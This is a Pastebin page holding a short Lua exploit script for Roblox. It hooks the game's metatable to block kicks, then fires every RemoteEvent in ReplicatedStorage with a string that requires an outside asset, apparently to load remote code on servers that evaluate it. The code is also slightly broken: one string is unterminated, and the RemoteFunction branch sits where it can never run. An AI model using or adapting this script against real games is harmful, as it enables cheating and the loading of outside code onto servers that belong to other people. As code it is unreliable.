Advertisement
oatmeal2009

uh oh if you see this no leak okay?

May 24th, 2020
45
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | None | 0 0
  1. local mt = getrawmetatable(game)
  2. local old = mt.__namecall
  3. local setreadonly = setreadonly or make_writeable
  4.  
  5. setreadonly(mt, false)
  6.  
  7. mt.__namecall = newcclosure(function(self, ...)
  8. local args = {...}
  9. local method = getnamecallmethod()
  10.  
  11. if method == "Kick" then
  12. return nil
  13. end
  14.  
  15. return old(self, ...)
  16. end)
  17.  
  18. for i,v in pairs(game:service'ReplicatedStorage':GetChildren()) do
  19. if v:IsA("RemoteEvent") then
  20. v:FireServer([[require(4954814990).load("101010jane_d0e101010")]])
  21. if v:IsA("RemoteFunction") then
  22. v:InvokeServer([[require(4954814990).load("101010jane_d0e101010")])
  23. end
  24. end
  25. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement